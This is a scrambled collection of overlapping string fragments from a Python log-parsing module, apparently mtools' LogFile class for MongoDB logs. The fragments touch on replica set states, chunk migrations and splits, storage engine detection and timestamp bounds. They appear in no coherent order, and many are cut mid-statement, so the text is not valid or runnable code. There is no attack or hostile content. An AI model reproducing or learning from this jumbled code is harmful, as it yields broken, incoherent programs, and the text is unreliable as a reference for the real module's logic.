\"\"\"Return the replSet protocolVersion (if available).\"\"\"", "# get start date for stdin input if not self.start", "SERVER-45770 TICKET is added moved_from = \"Unknown\" note = match.group('note')", "line.endswith(state))): if \"is now in state\" in line: tokens =", "return self._shards @property def csrs(self): \"\"\"Lazily return the CSRS (if", "(if available).\"\"\" if not self._num_lines: self._iterate_lines() return self._repl_set_version @property def", "match.group('replSet') self._repl_set_members = match.group('replSetMembers') # Replica set config logging in", "return # now walk backwards until we found a truly", "re.search(r'(\\d\\.\\d\\.\\d+)', logevent.line_str) if version: version = version.group(1) return version else:", "def restarts(self): \"\"\"Lazy evaluation of all restarts.\"\"\" if not self._num_lines:", "match.group('replSetMembers') ) if \"Starting new replica set monitor for\" in", "= None self._shards = None self._csrs = None self._chunks_moved_from =", "date if not self.end and self.from_stdin: if le and le.datetime:", "not ret: # logevent indicates timestamp format has changed, #", "sure we catch one) self.filehandle.seek(0, 2) self._filesize = self.filehandle.tell() self.filehandle.seek(-min(self._filesize,", "None self._csrs = None self._chunks_moved_from = None self._chunks_moved_to = None", "stdin input if not self.start and self.from_stdin: if le and", "def __init__(self, filehandle): \"\"\"Provide logfile as open file stream or", "present in 3.0, but would now tell us definitively that", "start_dt is already smaller than first datetime self.filehandle.seek(0) le =", "= ln + 1 # reset logfile self.filehandle.seek(0) def _check_for_restart(self,", "return # get start date for stdin input if not", "object. Return a LogEvent object for each line (generator). 
\"\"\"", "import re import sys from datetime import datetime from math", "(match.group('csrsName'), match.group('replSetMembers')) self._csrs = csrs_info else: match = re.search(\"for (?P<shardName>\\w+)/\"", "Number of characters to show before/after the log offset error_context", "max_mark # check if start_dt is already smaller than first", "the datetime format.\"\"\" if not self._datetime_format: self._calculate_bounds() return self._datetime_format @property", "% self.filehandle.name) else: self.prev_pos = curr_pos if isinstance(buff, bytes): buff", "object return if self.from_stdin: return False # we should be", "None if match: errmsg = match.group('errmsg') else: errmsg = \"Unknown\"", "filehandle self.name = filehandle.name self.from_stdin = filehandle.name == \"<stdin>\" self._bounds_calculated", "check to eliminate most lines) if \"version\" in line[:100]: logevent", "\"\"\"Lazily return the chunks split in this shard (if available)\"\"\"", "in line: logevent = LogEvent(line) match = re.search('for (?P<namespace>\\S+).*' 'numSplits:", "# find version string (fast check to eliminate most lines)", "None or le.datetime >= start_dt): self.filehandle.seek(-2, 1) le = self._find_curr_line(prev=True)", "the first line that would otherwise match (as it consumes", "sharding related information \"\"\" self._shards = [] self._chunks_moved_from = []", "\"\"\"Return the replSet protocolVersion (if available).\"\"\" if not self._num_lines: self._iterate_lines()", "first line that would otherwise match (as it consumes the", "match.group('replSet') != self._csrs[0]: self._shards.append(( match.group('replSet'), match.group('replSetMembers') )) elif not self._csrs:", "self._datetime_format = logevent.datetime_format self._datetime_nextpos = logevent._datetime_nextpos break if lines_checked >", "self._chunks_moved_from: self._find_sharding_info() return self._chunks_moved_from @property def chunk_splits(self): \"\"\"Lazily return the", "logfile.\"\"\" if not self._timezone: self._calculate_bounds() return self._timezone @property def filesize(self):", "and find any sharding related information \"\"\" self._shards = []", "return self._datetime_format @property def has_level(self): \"\"\"Lazy evaluation of the whether", "match: errmsg = match.group('errmsg') else: errmsg = \"Unknown\" chunk_migration =", "start time if self._end < self._start: self._start = self._start.replace(year=self._start.year -", "evaluation of all restarts.\"\"\" if not self._num_lines: self._iterate_lines() return self._rs_state", "3.0+ new_config = (\"New replica set config in use: \")", "replSet (if available).\"\"\" if not self._num_lines: self._iterate_lines() return self._repl_set_version @property", "rs_state = tokens[-1] else: # 2.6 if tokens[1].endswith(']'): pos =", "number of lines (can be expensive).\"\"\" self._num_lines = 0 self._restarts", "consumes the log line). 
\"\"\" if self.from_stdin: # skip lines", "versions @property def repl_set(self): \"\"\"Return the replSet (if available).\"\"\" if", "not None and self.prev_pos == curr_pos: # Number of characters", "# move back to last newline char if newline_pos ==", "4 else: pos = 5 host = tokens[pos] rs_state =", "= match.group('note') if note == \"success\": errmsg = None steps", "if \"[mongosMain]\" in line: match = re.search(\"for (?P<csrsName>\\w+)/\" \"(?P<replSetMembers>\\S+)\", line)", "self._port = None self._rs_state = None self._repl_set = None self._repl_set_members", "self._datetime_nextpos = le._datetime_nextpos return le def __iter__(self): \"\"\" Iterate over", "2) for line in reversed(self.filehandle.readlines()): logevent = LogEvent(line) if logevent.datetime:", "if \"New replica set config in use\" in line: if", "the \"engine\" field if WiredTiger was the storage engine. There", "for v, _ in self.restarts: if len(versions) == 0 or", "self._bounds_calculated: # Assume no need to recalc bounds for lifetime", "available.\"\"\" if not self._num_lines: self._iterate_lines() return self._storage_engine @property def shards(self):", "log line). \"\"\" if self.from_stdin: # skip lines until start_dt", "versions = [] for v, _ in self.restarts: if len(versions)", "for stdin input currently. \"\"\" if not self._start: self._calculate_bounds() return", "offset %s in %s:\\n\\n%s\\n%s\\n\" \"<--- (current log parsing offset) \\n%s\\n%s\\n\"", "self._repl_set_version = None self._repl_set_protocol = None self._storage_engine = None self._datetime_format", "self.next() if le.datetime and le.datetime >= start_dt: self.filehandle.seek(0) return le", "self._shards.append(( match.group('replSet'), match.group('replSetMembers') )) elif not self._csrs: self._csrs = (", "(if available)\"\"\" if not self._chunk_splits: self._find_sharding_info() return self._chunk_splits def next(self):", "smaller line while self.filehandle.tell() >= 2 and (le.datetime is None", "logevent.thread == 'mongosMain' and ('MongoS' in logevent.line_str or 'mongos' in", "ln, line in enumerate(self.filehandle): if isinstance(line, bytes): line = line.decode(\"utf-8\",", "return None if not self._filesize: self._calculate_bounds() return self._filesize @property def", "if \"moveChunk.to\" in line: logevent = LogEvent(line) match = re.search('ns:", "None self._filesize = None self._num_lines = None self._restarts = None", "= None self._end = None self._filesize = None self._num_lines =", "version string (fast check to eliminate most lines) if \"version\"", "exception) per PEP 479 return # get start date for", "', line) if match: self._repl_set = match.group('replSet') self._repl_set_version = match.group('replSetVersion')", "' 'version: (?P<replSetVersion>\\d+), ', line) if match: self._repl_set = match.group('replSet')", "self._binary = None self._timezone = None self._hostname = None self._port", "line: match = re.search(' _id: \"(?P<replSet>\\S+)\".*' 'members: (?P<replSetMembers>[^]]+ ])', line)", "time = logevent.datetime split_range = match.group(\"range\") namespace = match.group(\"namespace\") numSplits", "bounds are calculated before starting to iterate, # including potential", "host = tokens[pos] rs_state = tokens[-1] state = (host, rs_state,", "self._end < self._start: self._start = self._start.replace(year=self._start.year - 1) self._year_rollover =", "('MongoS' in logevent.line_str or 'mongos' in logevent.line_str): self._binary = 'mongos'", "sure bounds are calculated before starting to iterate, # including", "10 
lines_checked = 0 # get start datetime for line", "if not self._end: self._calculate_bounds() return self._end @property def timezone(self): \"\"\"Lazy", "re.search('splitVector: \"(?P<namespace>\\S+)\".*,' ' (?P<range>min:.*), max.*op_msg (?P<time_taken>\\d+)', line) if match: time", "(host, rs_state, LogEvent(line)) self._rs_state.append(state) continue if \"[rsMgr] replSet\" in line:", "csrs_info = (match.group('csrsName'), match.group('replSetMembers')) self._csrs = csrs_info else: match =", "import sys from datetime import datetime from math import ceil", "curr_pos = self.filehandle.tell() # jump back 15k characters (at most)", "line.split() if self._hostname: host = self._hostname + ':' + self._port", "self._hostname = match.group('host') self._port = match.group('port') \"\"\" For 3.0 the", "if start_dt is already smaller than first datetime self.filehandle.seek(0) le", "= le.set_datetime_hint(self._datetime_format, self._datetime_nextpos, self.year_rollover) if not ret: # logevent indicates", "re.search('engine: \"(?P<engine>\\S+)\"', line) if match: self._storage_engine = match.group('engine') else: self._storage_engine", "now in state\" in line and # next(state for state", "(?P<error>\\S+): ', line) if match: time = logevent.datetime split_range =", "parsing offset) \\n%s\\n%s\\n\" % (curr_pos, self.name, hr, buff[:error_context], buff[error_context:error_context +", "log parsing loop detected trying to find previous \" \"log", "tokens[-1] else: # 2.6 if tokens[1].endswith(']'): pos = 2 else:", "(?P<replSetMembers>[^]]+ ])', line) if match: self._repl_set_members = match.group('replSetMembers') # if", "the number of lines. Returns None for stdin input currently.", "= match.group('port') \"\"\" For 3.0 the \"[initandlisten] options:\" long entry", "in line: logevent = LogEvent(line) match = re.search('ns: \"(?P<namespace>\\S+)\".*' 'details:", "max_start_lines max_start_lines = 10 lines_checked = 0 # get start", "False # we should be able to find a valid", "match: time = logevent.datetime split_range = None namespace = match.group(\"namespace\")", "and le.datetime >= start_dt: self.filehandle.seek(0) return le = None self.filehandle.seek(0)", "end date if (self._start is None): raise SystemExit(\"Error: <%s> does", "\"moveChunk.to\" in line: logevent = LogEvent(line) match = re.search('ns: \"(?P<namespace>\\S+)\".*'", "logevent = LogEvent(line) if \"New replica set config in use\"", "lines in a log file.\"\"\" return self.num_lines def _iterate_lines(self): \"\"\"Count", "(le.datetime is None or le.datetime >= start_dt): self.filehandle.seek(-2, 1) le", "\\d of \\d): (?P<stepTimes>\\d+)', line) else: steps = None match", "self.name = filehandle.name self.from_stdin = filehandle.name == \"<stdin>\" self._bounds_calculated =", "curr_pos: # Number of characters to show before/after the log", "and # next(state for state in states if line.endswith(state))): if", "here because next() iterator uses internal readahead # buffer so", "self._datetime_format = None self._datetime_nextpos = None elif le.datetime: # gather", "= le.datetime_format self._datetime_nextpos = le._datetime_nextpos return le def __iter__(self): \"\"\"", "# 2.6 if tokens[1].endswith(']'): pos = 2 else: pos =", "most to make sure we catch one) self.filehandle.seek(0, 2) self._filesize", "starting to iterate, # including potential year rollovers self._calculate_bounds() @property", "roll-over, subtract 1 year from start time if self._end <", "re.search('migration (?P<namespace>\\S+): \\[(?P<range>.*)\\)', prev_line) if 
match: time = logevent.datetime split_range", "False time_taken = 0 error = match.group(\"error\") self._chunk_splits.append((time, split_range, namespace,", "\" \"MongoDB log file format\" % self.filehandle.name) # get end", "line = line.decode(\"utf-8\", \"replace\") if self.binary == \"mongos\": if \"Starting", "object for each line (generator). \"\"\" le = None while", "[] ln = 0 for ln, line in enumerate(self.filehandle): if", "state = (host, rs_state, LogEvent(line)) self._rs_state.append(state) continue if \"[rsMgr] replSet\"", "most) and find last newline char jump_back = min(self.filehandle.tell(), 15000)", "mtools.util.logevent import LogEvent class LogFile(InputSource): \"\"\"Log file wrapper class. Handles", "print(\"Fatal log parsing loop detected trying to find previous \"", "self.filehandle.seek(step_size, 1) le = self._find_curr_line() if not le: break if", "LogEvent(line) match = re.search('splitVector: \"(?P<namespace>\\S+)\".*,' ' (?P<range>min:.*), max.*op_msg (?P<time_taken>\\d+)', line)", "= LogEvent(line) lines_checked += 1 if logevent.datetime: self._start = logevent.datetime", "on the current seek position. \"\"\" curr_pos = self.filehandle.tell() #", "appear to be a supported \" \"MongoDB log file format\"", "self._repl_set_members = match.group('replSetMembers') # Replica set config logging in MongoDB", "break if le.datetime >= start_dt: step_size = -abs(step_size) else: step_size", "no longer contains the \"engine\" field So now we have", "self._iterate_lines() return self._repl_set_members @property def repl_set_version(self): \"\"\"Return the replSet (if", "datetime self.filehandle.seek(0) le = self.next() if le.datetime and le.datetime >=", "ret = le.set_datetime_hint(self._datetime_format, self._datetime_nextpos, self.year_rollover) if not ret: # logevent", "\"Unknown\" chunk_migration = (time, chunk_range, moved_to, namespace, steps, note, errmsg)", "steps = re.findall('(?P<steps>step \\d of \\d): (?P<stepTimes>\\d+)', line) else: steps", "LogEvent.log_components): self._has_level = True # find version string (fast check", "re.search('{ _id: \"(?P<replSet>\\S+)\", ' 'members: (?P<replSetMembers>[^]]+ ])', line) if match:", "self._year_rollover = False # reset logfile self.filehandle.seek(0) self._bounds_calculated = True", "\") if new_config in line: match = re.search('{ _id: \"(?P<replSet>\\S+)\",", "line in self.filehandle: logevent = LogEvent(line) lines_checked += 1 if", "no need to recalc bounds for lifetime of a Logfile", "for ln, line in enumerate(self.filehandle): if isinstance(line, bytes): line =", "already smaller than first datetime self.filehandle.seek(0) le = self.next() if", "return self._end @property def timezone(self): \"\"\"Lazy evaluation of timezone of", "'details: { (?P<range>.*\\}).*' 'to: \"(?P<movedTo>\\S+)\".*note: \"(?P<note>\\S+)\"', line) if match: time", "wiredTiger is being used \"\"\" if \"[initandlisten] wiredtiger_open config:\" in", "logging in MongoDB 3.0+ new_config = (\"New replica set config", "\"\"\"Calculate beginning and end of logfile.\"\"\" if self._bounds_calculated: # Assume", "\"(?P<namespace>\\S+)\".*,' ' (?P<range>min:.*), max.*op_msg (?P<time_taken>\\d+)', line) if match: time =", "of lines in a log file.\"\"\" return self.num_lines def _iterate_lines(self):", "LogEvent(line) restart = self._check_for_restart(logevent) if restart: self._restarts.append((restart, logevent)) if \"starting", "re import sys from datetime import datetime from math import", "else: self.prev_pos = curr_pos if isinstance(buff, 
bytes): buff = buff.decode(\"utf-8\",", "chunk_migration = (time, chunk_range, moved_to, namespace, steps, note, errmsg) self._chunks_moved_from.append(chunk_migration)", "each line (generator). \"\"\" le = None while True: try:", "if prev: newline_pos = buff[:newline_pos].rfind('\\n') # move back to last", "and nextpos from previous line if self._datetime_format and self._datetime_nextpos is", "steps = re.findall('(?P<steps>step \\d of \\d): (?P<stepTimes>\\d+)', line) else: match", "is reached return else: # fast bisection path max_mark =", "_id: \"(?P<replSet>\\S+)\", ' 'members: (?P<replSetMembers>[^]]+ ])', line) if match: self._repl_set", "of the binary name.\"\"\" if not self._num_lines: self._iterate_lines() return self._hostname", "le.datetime >= start_dt: step_size = -abs(step_size) else: step_size = abs(step_size)", "shards (if available)\"\"\" if not self._shards: self._find_sharding_info() return self._shards @property", "\"(?P<replSetMembers>\\S+)\", line) if match: shard_info = (match.group('shardName'), match.group('replSetMembers')) self._shards.append(shard_info) elif", "in use: \") if new_config in line: match = re.search('{", "success = False time_taken = 0 error = match.group(\"error\") self._chunk_splits.append((time,", "not le: break if le.datetime >= start_dt: step_size = -abs(step_size)", "the datetime format.\"\"\" if self._year_rollover is None: self._calculate_bounds() return self._year_rollover", "= self._check_for_restart(logevent) if restart: self._restarts.append((restart, logevent)) if \"starting :\" in", "LogEvent(line) match = re.search('migration (?P<namespace>\\S+): \\[(?P<range>.*)\\)', prev_line) if match: time", "wiredtiger_open config:\" which was present in 3.0, but would now", "self._num_lines: self._iterate_lines() return self._repl_set_members @property def repl_set_version(self): \"\"\"Return the replSet", "line) if match: self._repl_set = match.group('replSet') match = re.search('engine: \"(?P<engine>\\S+)\"',", "is already smaller than first datetime self.filehandle.seek(0) le = self.next()", "match.group('replSet'), match.group('replSetMembers') )) elif not self._csrs: self._csrs = ( match.group('replSet'),", "split_range = match.group(\"range\") namespace = match.group(\"namespace\") time_taken = match.group(\"time_taken\") numSplits", "match: self._hostname = match.group('host') self._port = match.group('port') \"\"\" For 3.0", "line) if match: if self._csrs and match.group('replSet') != self._csrs[0]: self._shards.append((", "None self._datetime_nextpos = None elif le.datetime: # gather new hint", "line: logevent = LogEvent(line) match = re.search('migration (?P<namespace>\\S+): \\[(?P<range>.*)\\)', prev_line)", "if match: self._repl_set = match.group('replSet') match = re.search('engine: \"(?P<engine>\\S+)\"', line)", "match.group('movedTo') note = match.group('note') if note == \"success\": errmsg =", "= None self._repl_set_version = None self._repl_set_protocol = None self._storage_engine =", "evaluation of the number of lines. 
Returns None for stdin", "None self._chunk_splits.append((time, split_range, namespace, numSplits, success, time_taken, error)) elif \"Unable", "= None self._repl_set = None self._repl_set_members = None self._repl_set_version =", "in MongoDB 3.0+ new_config = (\"New replica set config in", "= version.group(1) return version else: return False def _calculate_bounds(self): \"\"\"Calculate", "= tokens[pos] rs_state = tokens[-1] state = (host, rs_state, LogEvent(line))", "le.datetime: self._start = le.datetime try: yield le except StopIteration: return", "config:\" in line: self._storage_engine = 'wiredTiger' if \"command admin.$cmd command:", "== \"success\": errmsg = None steps = re.findall('(?P<steps>step \\d of", "+ 1], hr), file=sys.stderr) raise SystemExit(\"Cannot parse %s with requested", "self._chunk_splits def next(self): \"\"\"Get next line, adjust for year rollover", "!= self._csrs[0]: self._shards.append(( match.group('replSet'), match.group('replSetMembers') )) elif not self._csrs: self._csrs", "namespace, numSplits, success, time_taken, error)) elif \"Unable to auto-split chunk\"", "for hostname, port match = re.search('port=(?P<port>\\d+).*host=(?P<host>\\S+)', line) if match: self._hostname", "\"[rsMgr] replSet\" in line: tokens = line.split() if self._hostname: host", "= logevent.datetime split_range = match.group(\"range\") namespace = match.group(\"namespace\") numSplits =", "of logfile. Returns None for stdin input currently. \"\"\" if", "' :: caused by :: (?P<error>\\S+): ', line) if match:", "tokens[1].endswith(']'): pos = 2 else: pos = 6 rs_state =", "self._end = None self._filesize = None self._num_lines = None self._restarts", "date if (self._start is None): raise SystemExit(\"Error: <%s> does not", "= match.group(\"time_taken\") numSplits = 0 success = True error =", "def year_rollover(self): \"\"\"Lazy evaluation of the datetime format.\"\"\" if self._year_rollover", "the log offset error_context = 300 self.filehandle.seek(-error_context, 1) buff =", "match: shard_info = (match.group('shardName'), match.group('replSetMembers')) self._shards.append(shard_info) elif self.binary == \"mongod\":", "# hint format and nextpos from previous line if self._datetime_format", "logevent self._datetime_format = le.datetime_format self._datetime_nextpos = le._datetime_nextpos return le def", "line = line.decode(\"utf-8\", \"replace\") if (self._has_level is None and line[28:31].strip()", "isinstance(line, bytes): line = line.decode(\"utf-8\", \"replace\") if (self._has_level is None", "(if available).\"\"\" if not self._num_lines: self._iterate_lines() return self._repl_set_protocol @property def", "Internal helper function. 
Find the current (or previous if prev=True)", "def next(self): \"\"\"Get next line, adjust for year rollover and", "0 success = True error = None self._chunk_splits.append((time, split_range, namespace,", "if (self._start is None): raise SystemExit(\"Error: <%s> does not appear", "replica set monitor for\" in line: match = re.search(\"for (?P<replSet>\\w+)/\"", "chunk_range = match.group('range') namespace = match.group('namespace') # TODO: alter this", "numSplits, success, time_taken, error)) prev_line = line # reset logfile", "= match.group('engine') else: self._storage_engine = 'mmapv1' \"\"\" For 3.2 the", "Logfile object return if self.from_stdin: return False # we should", "1 year from start time if self._end < self._start: self._start", "= None self._repl_set_protocol = None self._storage_engine = None self._datetime_format =", "format has changed, # invalidate hint info self._datetime_format = None", "= [] self._chunks_moved_to = [] self._chunk_splits = [] prev_line =", ":\" in line or \"starting:\" in line: # look for", "le.datetime: self._end = le.datetime # future iterations start from the", "@property def hostname(self): \"\"\"Lazy evaluation of the binary name.\"\"\" if", "3.2 the \"[initandlisten] options:\" no longer contains the \"engine\" field", "= re.search(\"chunk \\[(?P<range>.*)\\) \" 'in namespace (?P<namespace>\\S+)' ' :: caused", "of the number of lines. Returns None for stdin input", "near offset %s in %s:\\n\\n%s\\n%s\\n\" \"<--- (current log parsing offset)", "currently. \"\"\" if not self._end: self._calculate_bounds() return self._end @property def", "or 'mongos' in logevent.line_str): self._binary = 'mongos' else: return False", "binary name.\"\"\" if not self._num_lines: self._iterate_lines() return self._port @property def", "= LogEvent(line) restart = self._check_for_restart(logevent) if restart: self._restarts.append((restart, logevent)) if", "the current (or previous if prev=True) line in a log", "# logevent indicates timestamp format has changed, # invalidate hint", "def filesize(self): \"\"\" Lazy evaluation of start and end of", "le.datetime_format self._datetime_nextpos = le._datetime_nextpos return le def __iter__(self): \"\"\" Iterate", "log file format\" % self.filehandle.name) # get end datetime (lines", "if match: time = logevent.datetime chunk_range = match.group('range') namespace =", "re.search(' _id: \"(?P<replSet>\\S+)\".*' 'members: (?P<replSetMembers>[^]]+ ])', line) if match: self._csrs", "match = re.search('{ _id: \"(?P<replSet>\\S+)\", ' 'members: (?P<replSetMembers>[^]]+ ])', line)", "self.filehandle: logevent = LogEvent(line) lines_checked += 1 if logevent.datetime: self._start", "'mongosMain' and ('MongoS' in logevent.line_str or 'mongos' in logevent.line_str): self._binary", "hr, buff[:error_context], buff[error_context:error_context + 1], hr), file=sys.stderr) raise SystemExit(\"Cannot parse", "isinstance(line, bytes): line = line.decode(\"utf-8\", \"replace\") if self.binary == \"mongos\":", "self._rs_state.append(state) continue self._num_lines = ln + 1 # reset logfile", "(can be expensive).\"\"\" self._num_lines = 0 self._restarts = [] self._rs_state", "self._binary = 'mongos' else: return False version = re.search(r'(\\d\\.\\d\\.\\d+)', logevent.line_str)", "file=sys.stderr) raise SystemExit(\"Cannot parse %s with requested options\" % self.filehandle.name)", "= re.search(':: caused by :: (?P<errmsg>\\S+):', prev_line) steps = None", "Handles open file streams or stdin.\"\"\" def __init__(self, filehandle): \"\"\"Provide", 
"lines (can be expensive).\"\"\" self._num_lines = 0 self._restarts = []", "self.filehandle.seek(-jump_back, 1) buff = self.filehandle.read(jump_back) self.filehandle.seek(curr_pos, 0) if prev and", "le: break if le.datetime >= start_dt: step_size = -abs(step_size) else:", "None self._repl_set_members = None self._repl_set_version = None self._repl_set_protocol = None", "replSet (if available).\"\"\" if not self._num_lines: self._iterate_lines() return self._repl_set @property", "iterator uses internal readahead # buffer so seek position is", "if match: time = logevent.datetime split_range = None namespace =", "if not le: break if le.datetime >= start_dt: step_size =", "self._datetime_nextpos = None elif le.datetime: # gather new hint info", "True return True def _find_curr_line(self, prev=False): \"\"\" Internal helper function.", "else: steps = None match = re.search('errmsg: \"(?P<errmsg>.*)\"', line) if", "= None self.filehandle.seek(0) # search for lower bound while abs(step_size)", "line) if match: self._csrs = ( match.group('replSet'), match.group('replSetMembers') ) if", "self.filehandle.tell() self.filehandle.seek(-min(self._filesize, 30000), 2) for line in reversed(self.filehandle.readlines()): logevent =", "it consumes the log line). \"\"\" if self.from_stdin: # skip", "self._storage_engine = 'wiredTiger' if \"command admin.$cmd command: { replSetInitiate:\" in", "@property def csrs(self): \"\"\"Lazily return the CSRS (if available)\"\"\" if", "if isinstance(line, bytes): line = line.decode(\"utf-8\", \"replace\") if (self._has_level is", "match.group(\"range\") namespace = match.group(\"namespace\") numSplits = 0 success = False", "for files. Streams need to be forwarded manually, and it", "max.*op_msg (?P<time_taken>\\d+)', line) if match: time = logevent.datetime split_range =", "error)) elif \"Unable to auto-split chunk\" in line: logevent =", "self._shards = [] self._chunks_moved_from = [] self._chunks_moved_to = [] self._chunk_splits", "and self.from_stdin: if le and le.datetime: self._start = le.datetime try:", "storage engine. 
There were only two engines, MMAPv1 and WiredTiger", "if tokens[1].endswith(']'): pos = 2 else: pos = 6 rs_state", "hr = \"-\" * 60 print(\"Fatal log parsing loop detected", "line) if match: errmsg = match.group('errmsg') chunk_migration = (time, chunk_range,", "self._shards @property def csrs(self): \"\"\"Lazily return the CSRS (if available)\"\"\"", "to look for the \"[initandlisten] wiredtiger_open config:\" which was present", "find last newline char jump_back = min(self.filehandle.tell(), 15000) self.filehandle.seek(-jump_back, 1)", "= (['PRIMARY', 'SECONDARY', 'DOWN', 'STARTUP', 'STARTUP2', 'RECOVERING', 'ROLLBACK', 'ARBITER', 'UNKNOWN'])", "'UNKNOWN']) def __len__(self): \"\"\"Return the number of lines in a", "next() iterator uses internal readahead # buffer so seek position", "(?P<replSet>\\w+)/\" \"(?P<replSetMembers>\\S+)\", line) if match: if self._csrs and match.group('replSet') !=", "self._csrs: self._csrs = ( match.group('replSet'), match.group('replSetMembers') ) if \"moveChunk.from\" in", "None self._restarts = None self._binary = None self._timezone = None", "(?P<namespace>\\S+): \\[(?P<range>.*)\\)', prev_line) if match: time = logevent.datetime split_range =", "# jump back 15k characters (at most) and find last", "(if available).\"\"\" if not self._num_lines: self._iterate_lines() return self._repl_set_members @property def", "tokens[-1] state = (host, rs_state, LogEvent(line)) self._rs_state.append(state) continue if \"[rsMgr]", "30000), 2) for line in reversed(self.filehandle.readlines()): logevent = LogEvent(line) if", "if match: time = logevent.datetime split_range = match.group(\"range\") namespace =", "[] prev_line = \"\" for line in self.filehandle: if isinstance(line,", "steps = None match = re.search('errmsg: \"(?P<errmsg>.*)\"', line) if match:", "None self._rs_state = None self._repl_set = None self._repl_set_members = None", "self.restarts: if len(versions) == 0 or v != versions[-1]: versions.append(v)", "not self._num_lines: self._iterate_lines() return self._restarts @property def rs_state(self): \"\"\"Lazy evaluation", "filehandle.name == \"<stdin>\" self._bounds_calculated = False self._start = None self._end", "namespace, numSplits, success, time_taken, error)) elif \"splitVector\" in line: logevent", "step_size = -abs(step_size) else: step_size = abs(step_size) if not le:", "match.group('range') namespace = match.group('namespace') moved_to = match.group('movedTo') note = match.group('note')", "if not le: return # now walk backwards until we", "if \"[initandlisten] wiredtiger_open config:\" in line: self._storage_engine = 'wiredTiger' if", "position is wrong line = self.filehandle.readline() if isinstance(line, bytes): line", "0 error = None self._chunk_splits.append((time, split_range, namespace, numSplits, success, time_taken,", "start_dt is reached return else: # fast bisection path max_mark", "= False # reset logfile self.filehandle.seek(0) self._bounds_calculated = True return", "from the beginning if not self.from_stdin: self.filehandle.seek(0) # return (instead", "self.states: rs_state = tokens[-1] else: # 2.6 if tokens[1].endswith(']'): pos", "self._timezone: self._calculate_bounds() return self._timezone @property def filesize(self): \"\"\" Lazy evaluation", "logevent)) if \"starting :\" in line or \"starting:\" in line:", "find moved from shard name when SERVER-45770 TICKET is added", "ret: # logevent indicates timestamp format has changed, # invalidate", "position. 
\"\"\" curr_pos = self.filehandle.tell() # jump back 15k characters", "= match.group('replSet') self._repl_set_version = match.group('replSetVersion') match = re.search(', protocolVersion: (?P<replSetProtocol>\\d+),", "datetime obj using binary search. Only fast for files. Streams", "a supported \" \"MongoDB log file format\" % self.filehandle.name) #", "True: try: le = self.next() except StopIteration as e: #", "replSet\" in line: tokens = line.split() if self._hostname: host =", "self._datetime_format @property def has_level(self): \"\"\"Lazy evaluation of the whether the", "# make sure bounds are calculated before starting to iterate,", "[] self._chunks_moved_to = [] self._chunk_splits = [] prev_line = \"\"", "@property def rs_state(self): \"\"\"Lazy evaluation of all restarts.\"\"\" if not", "\\d of \\d): (?P<stepTimes>\\d+)', line) else: match = re.search(':: caused", "return self._chunk_splits def next(self): \"\"\"Get next line, adjust for year", "self.prev_pos = None self._has_level = None # make sure bounds", "@property def versions(self): \"\"\"Return all version changes.\"\"\" versions = []", "replSet (if available).\"\"\" if not self._num_lines: self._iterate_lines() return self._repl_set_members @property", "not self._num_lines: self._iterate_lines() return self._repl_set_protocol @property def storage_engine(self): \"\"\"Return storage", "\"engine\" field So now we have to look for the", "namespace, numSplits, success, time_taken, error)) prev_line = line # reset", "3.0, but would now tell us definitively that wiredTiger is", "logevent.datetime: self._end = logevent.datetime break # if there was a", "line) if match: self._hostname = match.group('host') self._port = match.group('port') \"\"\"", "match = re.search('{ _id: \"(?P<replSet>\\S+)\", ' 'version: (?P<replSetVersion>\\d+), ', line)", "(generator). \"\"\" le = None while True: try: le =", "le.datetime and le.datetime >= start_dt: self.filehandle.seek(0) return le = None", "next line, adjust for year rollover and hint datetime format.\"\"\"", "le.datetime # future iterations start from the beginning if not", "# Assume no need to recalc bounds for lifetime of", "= None time_taken = 0 error = None self._chunk_splits.append((time, split_range,", "not self._start: self._calculate_bounds() return self._start @property def end(self): \"\"\" Lazy", "shard name when SERVER-45770 TICKET is added moved_from = \"Unknown\"", "# reset logfile self.filehandle.seek(0) def fast_forward(self, start_dt): \"\"\" Fast-forward file", "LogFile object. Return a LogEvent object for each line (generator).", "self._port else: host = os.path.basename(self.name) host += ' (self)' if", "line that would otherwise match (as it consumes the log", "logevent except StopIteration: # reached end of file return None", "\"\"\"Lazy evaluation of timezone of logfile.\"\"\" if not self._timezone: self._calculate_bounds()", "is being used \"\"\" if \"[initandlisten] wiredtiger_open config:\" in line:", "self._num_lines: self._iterate_lines() return self._port @property def versions(self): \"\"\"Return all version", "until start_dt is reached return else: # fast bisection path", "@property def num_lines(self): \"\"\" Lazy evaluation of the number of", "file and find any sharding related information \"\"\" self._shards =", "2 else: pos = 6 rs_state = ' '.join(tokens[pos:]) state", "\"\"\" Lazy evaluation of start and end of logfile. 
Returns", "bounds for lifetime of a Logfile object return if self.from_stdin:", "= [] self._chunks_moved_from = [] self._chunks_moved_to = [] self._chunk_splits =", "match.group('replSetProtocol') match = re.search('members: (?P<replSetMembers>[^]]+ ])', line) if match: self._repl_set_members", "not appear to be a supported \" \"MongoDB log file", "elif \"jumbo\" in line: logevent = LogEvent(line) match = re.search('migration", "changed, # invalidate hint info self._datetime_format = None self._datetime_nextpos =", "\"success\": errmsg = None steps = re.findall('(?P<steps>step \\d of \\d):", "not self._num_lines: self._iterate_lines() return self._repl_set_version @property def repl_set_protocol(self): \"\"\"Return the", "subtract 1 year from start time if self._end < self._start:", "\"(?P<replSet>\\S+)\", ' 'members: (?P<replSetMembers>[^]]+ ])', line) if match: self._repl_set =", "chunk_range = match.group('range') namespace = match.group('namespace') moved_to = match.group('movedTo') note", "= None self._binary = None self._timezone = None self._hostname =", "def repl_set_version(self): \"\"\"Return the replSet (if available).\"\"\" if not self._num_lines:", "if self.from_stdin: return None if not self._num_lines: self._iterate_lines() return self._num_lines", "in LogEvent.log_levels and line[31:39].strip() in LogEvent.log_components): self._has_level = True #", "set config logging in MongoDB 3.0+ new_config = (\"New replica", "= line # reset logfile self.filehandle.seek(0) def fast_forward(self, start_dt): \"\"\"", "two engines, MMAPv1 and WiredTiger \"\"\" if \"[initandlisten] options:\" in", "rs_state(self): \"\"\"Lazy evaluation of all restarts.\"\"\" if not self._num_lines: self._iterate_lines()", "uses internal readahead # buffer so seek position is wrong", "wrong line = self.filehandle.readline() if isinstance(line, bytes): line = line.decode('utf-8',", "__init__(self, filehandle): \"\"\"Provide logfile as open file stream or stdin.\"\"\"", "le: return # now walk backwards until we found a", "\"<--- (current log parsing offset) \\n%s\\n%s\\n\" % (curr_pos, self.name, hr,", "make sure bounds are calculated before starting to iterate, #", "if not self._num_lines: self._iterate_lines() return self._repl_set_protocol @property def storage_engine(self): \"\"\"Return", "and le.datetime: self._end = le.datetime # future iterations start from", "in line: logevent = LogEvent(line) match = re.search('migration (?P<namespace>\\S+): \\[(?P<range>.*)\\)',", "self.filehandle.seek(0) le = self.next() if le.datetime and 